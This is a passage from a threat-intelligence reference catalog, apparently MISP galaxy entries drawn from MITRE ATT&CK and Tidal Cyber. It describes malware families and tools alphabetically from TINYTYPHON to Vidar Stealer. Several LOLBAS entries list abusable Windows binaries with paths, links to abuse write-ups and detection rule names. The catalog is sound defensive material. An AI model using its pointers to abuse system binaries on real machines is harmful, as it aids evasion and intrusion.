| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TINYTYPHON
TINYTYPHON is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. [Forcepoint Monsoon]
Internal MISP references
UUID 0e009cb8-848e-427a-9581-d3a4fd9f6a87 which can be used as unique global reference for TINYTYPHON in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0131 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TinyZBot
TinyZBot is a bot written in C# that was developed by Cleaver. [Cylance Cleaver]
Internal MISP references
UUID 277290fe-51f3-4822-bb46-8b69fd1c8ae5 which can be used as unique global reference for TinyZBot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0004 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Tomiris
Tomiris is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between Tomiris and GoldMax.[Kaspersky Tomiris Sep 2021]
Internal MISP references
UUID eff417ad-c775-4a95-9f36-a1b5a675ba82 which can be used as unique global reference for Tomiris in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0671 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Tor
Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. [Dingledine Tor The Second-Generation Onion Router]
Internal MISP references
UUID 8c70d85b-b06d-423c-8bab-ecff18f332d6 which can be used as unique global reference for Tor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0183 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Torisma
Torisma is a second stage implant designed for specialized monitoring that has been used by Lazarus Group. Torisma was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.[McAfee Lazarus Nov 2020]
Internal MISP references
UUID 4bce135b-91ba-45ae-88f9-09e01f983a74 which can be used as unique global reference for Torisma in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0678 |
| source | MITRE |
| type | ['malware'] |
Tracker
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft .Net Framework.
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/subTee/status/793151392185589760 * https://attack.mitre.org/wiki/Execution
Detection: * Sigma: proc_creation_win_lolbin_tracker.yml[LOLBAS Tracker]
Internal MISP references
UUID 62ebde4b-4936-49f6-842b-8c0313ea26f5 which can be used as unique global reference for Tracker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5242 |
| source | Tidal Cyber |
| tags | ['3c9b26cf-9bda-4feb-ab42-ef7865cc80fd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
TrailBlazer
TrailBlazer is a modular malware that has been used by APT29 since at least 2019.[CrowdStrike StellarParticle January 2022]
Internal MISP references
UUID 7a6ae9f8-5f8b-4e94-8716-d8ee82027197 which can be used as unique global reference for TrailBlazer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0682 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TrickBot
TrickBot is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to Dyre. TrickBot was developed and initially used by Wizard Spider for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.[S2 Grupo TrickBot June 2017][Fidelis TrickBot Oct 2016][IBM TrickBot Nov 2016][CrowdStrike Wizard Spider October 2020]
Internal MISP references
UUID c2bd4213-fc7b-474f-b5a0-28145b07c51d which can be used as unique global reference for TrickBot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0266 |
| source | MITRE |
| tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Trojan.Karagany
Trojan.Karagany is a modular remote access tool used for recon and linked to Dragonfly. The source code for Trojan.Karagany originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. [Symantec Dragonfly][Secureworks Karagany July 2019][Dragos DYMALLOY ]
Internal MISP references
UUID b88c4891-40da-4832-ba42-6c6acd455bd1 which can be used as unique global reference for Trojan.Karagany in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0094 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Trojan.Mebromi
Trojan.Mebromi is BIOS-level malware that takes control of the victim before MBR. [Ge 2011]
Internal MISP references
UUID f8a4213d-633b-4e3d-8e59-a769e852b93b which can be used as unique global reference for Trojan.Mebromi in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0001 |
| source | MITRE |
| type | ['malware'] |
Truebot
Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.[U.S. CISA Increased Truebot Activity July 6 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.silence
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/truebot/
PulseDive (IOCs): https://pulsedive.com/threat/Truebot
Internal MISP references
UUID 669f8b7a-2404-47ab-843d-e63431faafec which can be used as unique global reference for Truebot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5000 |
| source | Tidal Cyber |
| tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Truvasys
Truvasys is first-stage malware that has been used by PROMETHIUM. It is a collection of modules written in the Delphi programming language. [Microsoft Win Defender Truvasys Sep 2017] [Microsoft NEODYMIUM Dec 2016] [Microsoft SIR Vol 21]
Internal MISP references
UUID 50844dba-8999-42ba-ba29-511e3faf4bc3 which can be used as unique global reference for Truvasys in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0178 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TSCookie
TSCookie is a remote access tool (RAT) that has been used by BlackTech in campaigns against Japanese targets.[JPCert TSCookie March 2018][JPCert BlackTech Malware September 2019]. TSCookie has been referred to as PLEAD though more recent reporting indicates a separation between the two.[JPCert PLEAD Downloader June 2018][JPCert BlackTech Malware September 2019]
Internal MISP references
UUID 9872ab5a-c76e-4404-91f9-5b745722443b which can be used as unique global reference for TSCookie in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0436 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TShark
TShark is a network protocol analyzer utility.
Internal MISP references
UUID 57f9458f-4dad-411e-9971-8e3e166f173b which can be used as unique global reference for TShark in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5268 |
| source | Tidal Cyber |
| tags | ['e1be4b53-7524-4e88-bf6d-358cfdf96772', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Ttdinject
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: Maxime Nadeau
Paths: * C:\Windows\System32\ttdinject.exe * C:\Windows\Syswow64\ttdinject.exe
Resources: * https://twitter.com/Oddvarmoe/status/1196333160470138880
Detection: * Sigma: create_remote_thread_win_ttdinjec.yml * Sigma: proc_creation_win_lolbin_ttdinject.yml * IOC: Parent child relationship. Ttdinject.exe parent for executed command * IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process[Ttdinject.exe - LOLBAS Project]
Internal MISP references
UUID 7bd9859e-4260-4c86-903b-1f8bcf658da1 which can be used as unique global reference for Ttdinject in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5168 |
| source | Tidal Cyber |
| tags | ['fc67aea7-f207-4cf5-8413-e33c76538cf6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Tttracer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows 1809 and newer to Debug Time Travel
Author: Oddvar Moe
Paths: * C:\Windows\System32\tttracer.exe * C:\Windows\SysWOW64\tttracer.exe
Resources: * https://twitter.com/oulusoyum/status/1191329746069655553 * https://twitter.com/mattifestation/status/1196390321783025666 * https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html
Detection: * Sigma: proc_creation_win_lolbin_tttracer_mod_load.yml * Sigma: image_load_tttracer_mod_load.yml * Elastic: credential_access_cmdline_dump_tool.toml * IOC: Parent child relationship. Tttracer parent for executed command[Tttracer.exe - LOLBAS Project]
Internal MISP references
UUID ab06ccb0-21c7-4d84-99ff-3349ce476910 which can be used as unique global reference for Tttracer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5169 |
| source | Tidal Cyber |
| tags | ['3c4e3160-4e82-49ce-b6a3-17879dd4b83c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Turian
Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.[ESET BackdoorDiplomacy Jun 2021]
Internal MISP references
UUID 571a45a7-68c9-452c-99bf-1d5b5fdd08b3 which can be used as unique global reference for Turian in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0647 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TURNEDUP
TURNEDUP is a non-public backdoor. It has been dropped by APT33's StoneDrill malware. [FireEye APT33 Sept 2017] [FireEye APT33 Webinar Sept 2017]
Internal MISP references
UUID c7f10715-cf13-4360-8511-aa3f93dd7688 which can be used as unique global reference for TURNEDUP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0199 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
TYPEFRAME
TYPEFRAME is a remote access tool that has been used by Lazarus Group. [US-CERT TYPEFRAME June 2018]
Internal MISP references
UUID 6c93d3c4-cae5-48a9-948d-bc5264230316 which can be used as unique global reference for TYPEFRAME in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0263 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
UACMe
UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. [Github UACMe]
Internal MISP references
UUID 5788edee-d1b7-4406-9122-bee596362236 which can be used as unique global reference for UACMe in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0116 |
| source | MITRE |
| tags | ['7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
UBoatRAT
UBoatRAT is a remote access tool that was identified in May 2017.[PaloAlto UBoatRAT Nov 2017]
Internal MISP references
UUID 5214ae01-ccd5-4e97-8f9c-14eb16e75544 which can be used as unique global reference for UBoatRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0333 |
| source | MITRE |
| type | ['malware'] |
Umbreon
A Linux rootkit that provides backdoor access and hides from defenders.
Internal MISP references
UUID 227c12df-8126-4e79-b9bd-0e4633fa12fa which can be used as unique global reference for Umbreon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0221 |
| source | MITRE |
| type | ['malware'] |
Universal Virus Sniffer
Universal Virus Sniffer is a tool that can be used for impairing and evading an environment's defenses.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID d876bb61-3122-44e7-ace4-f473a7b30f58 which can be used as unique global reference for Universal Virus Sniffer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5276 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Unknown Logger
Unknown Logger is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. [Forcepoint Monsoon]
Internal MISP references
UUID 846b3762-3949-4501-b781-6dca22db088f which can be used as unique global reference for Unknown Logger in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0130 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Unregmp2
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Windows Media Player Setup Utility
Author: Wade Hickey
Paths: * C:\Windows\System32\unregmp2.exe * C:\Windows\SysWOW64\unregmp2.exe
Resources: * https://twitter.com/notwhickey/status/1466588365336293385
Detection:
* Sigma: proc_creation_win_lolbin_unregmp2.yml
* IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of unregmp2.exe /HideWMP[Unregmp2.exe - LOLBAS Project]
Internal MISP references
UUID 456fb5b3-76e5-47f4-b964-09d68adb889e which can be used as unique global reference for Unregmp2 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5170 |
| source | Tidal Cyber |
| tags | ['40f11d0d-09f2-4bd1-bc79-1430464a52a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Update
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: Oddvar Moe
Paths: * %localappdata%\Microsoft\Teams\update.exe
Resources: * https://www.youtube.com/watch?v=rOP3hnkj7ls * https://twitter.com/reegun21/status/1144182772623269889 * https://twitter.com/MrUn1k0d3r/status/1143928885211537408 * https://twitter.com/reegun21/status/1291005287034281990 * http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ * https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 * https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 * https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/
Detection: * Sigma: proc_creation_win_lolbin_squirrel.yml * IOC: Update.exe spawned an unknown process[Update.exe - LOLBAS Project]
Internal MISP references
UUID 487d4c42-12ee-4c90-b284-cca04dadb951 which can be used as unique global reference for Update in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5243 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
UPPERCUT
UPPERCUT is a backdoor that has been used by menuPass. [FireEye APT10 Sept 2018]
Internal MISP references
UUID a3c211f8-52aa-4bfd-8382-940f2194af28 which can be used as unique global reference for UPPERCUT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0275 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Url
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Internet Shortcut Shell Extension DLL.
Author: LOLBAS Team
Paths: * c:\windows\system32\url.dll * c:\windows\syswow64\url.dll
Resources: * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/DissectMalware/status/995348436353470465 * https://twitter.com/bohops/status/974043815655956481 * https://twitter.com/yeyint_mth/status/997355558070927360 * https://twitter.com/Hexacorn/status/974063407321223168 * https://windows10dll.nirsoft.net/url_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Url.dll - LOLBAS Project]
Internal MISP references
UUID 96e24cc0-f1ce-4595-90c4-5a4976394db8 which can be used as unique global reference for Url in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5200 |
| source | Tidal Cyber |
| tags | ['34505028-b7d8-4da4-8dee-9926f3dbd37a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Uroburos
Uroburos is a sophisticated cyber espionage tool written in C that has been used by units within Russia's Federal Security Service (FSB) associated with the Turla toolset to collect intelligence on sensitive targets worldwide. Uroburos has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. Uroburos is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. Uroburos has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023][Kaspersky Turla]
Internal MISP references
UUID 89ffc27c-b81f-473a-87d6-907cacdce61c which can be used as unique global reference for Uroburos in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0022 |
| source | MITRE |
| tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ursnif
Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[NJCCIC Ursnif Sept 2016][ProofPoint Ursnif Aug 2016] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[TrendMicro Ursnif Mar 2015]
Internal MISP references
UUID 3e501609-87e4-4c47-bd88-5054be0f1037 which can be used as unique global reference for Ursnif in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0386 |
| source | MITRE |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
USBferry
USBferry is an information stealing malware and has been used by Tropic Trooper in targeted attacks against Taiwanese and Philippine air-gapped military environments. USBferry shares an overlapping codebase with YAHOYAH, though it has several features which makes it a distinct piece of malware.[TrendMicro Tropic Trooper May 2020]
Internal MISP references
UUID 26d93db8-dbc3-44b5-a393-2b219cef4f5b which can be used as unique global reference for USBferry in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0452 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
USBStealer
USBStealer is malware that has been used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL. [ESET Sednit USBStealer 2014] [Kaspersky Sofacy]
Internal MISP references
UUID 50eab018-8d52-46f5-8252-95942c2c0a89 which can be used as unique global reference for USBStealer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0136 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
UtilityFunctions
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Paths: * C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Resources: * https://twitter.com/nickvangilder/status/1441003666274668546
Detection: * Sigma: proc_creation_win_lolbas_utilityfunctions.yml[UtilityFunctions.ps1 - LOLBAS Project]
Internal MISP references
UUID 50a57a6f-6597-42d1-b686-7003c631ddb0 which can be used as unique global reference for UtilityFunctions in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5262 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Valak
Valak is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.[Cybereason Valak May 2020][Unit 42 Valak July 2020]
Internal MISP references
UUID b149f12f-3cf4-4547-841d-c63b7677547d which can be used as unique global reference for Valak in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0476 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
VaporRage
VaporRage is a shellcode downloader that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 63940761-8dea-4362-8795-7bc0653ce1d4 which can be used as unique global reference for VaporRage in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0636 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Vasport
Vasport is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Vasport May 2012]
Internal MISP references
UUID fe116518-cd0c-4b10-8190-4f57208df4e4 which can be used as unique global reference for Vasport in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0207 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
vbc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used for compile vbs code
Author: Lior Adar
Paths: * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_visual_basic_compiler.yml * Elastic: defense_evasion_dotnet_compiler_parent_process.toml[vbc.exe - LOLBAS Project]
Internal MISP references
UUID 25ae056b-aa3d-4bfb-9b53-ba76bce0dad1 which can be used as unique global reference for vbc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5171 |
| source | Tidal Cyber |
| tags | ['bc6f5172-90af-491e-817d-2eaa522f93af', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
VBShower
VBShower is a backdoor that has been used by Inception since at least 2019. VBShower has been used as a downloader for second stage payloads, including PowerShower.[Kaspersky Cloud Atlas August 2019]
Internal MISP references
UUID 150b6079-bb10-48a8-b570-fbe8b0e3287c which can be used as unique global reference for VBShower in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0442 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Verclsid
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to verify a COM object before it is instantiated by Windows Explorer
Author: @bohops
Paths: * C:\Windows\System32\verclsid.exe * C:\Windows\SysWOW64\verclsid.exe
Resources: * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Detection: * Sigma: proc_creation_win_verclsid_runs_com.yml * Splunk: verclsid_clsid_execution.yml[LOLBAS Verclsid]
Internal MISP references
UUID 56dc0bea-bdfb-4731-b6c0-425fb7f9bf4d which can be used as unique global reference for Verclsid in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5172 |
| source | Tidal Cyber |
| tags | ['4e91036d-809b-4eae-8a09-86bdc6cd1f0e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
VERMIN
VERMIN is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. [Unit 42 VERMIN Jan 2018]
Internal MISP references
UUID afa4023f-aa2e-45d6-bb3c-38e61f876eac which can be used as unique global reference for VERMIN in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0257 |
| source | MITRE |
| type | ['malware'] |
Vidar Stealer
Vidar Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. While many of today's most popular infostealers were developed relatively recently, Vidar is more established, having been released in 2018. Its developers continue to add new capabilities, however, for example to improve the malware's stealth.[Minerva Labs Vidar Stealer Evasion]
More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).
Internal MISP references
UUID ced8364c-e0e2-429a-a029-300fa2f0d5be which can be used as unique global reference for Vidar Stealer in MISP communities and other software using the MISP galaxy
Associated metadata
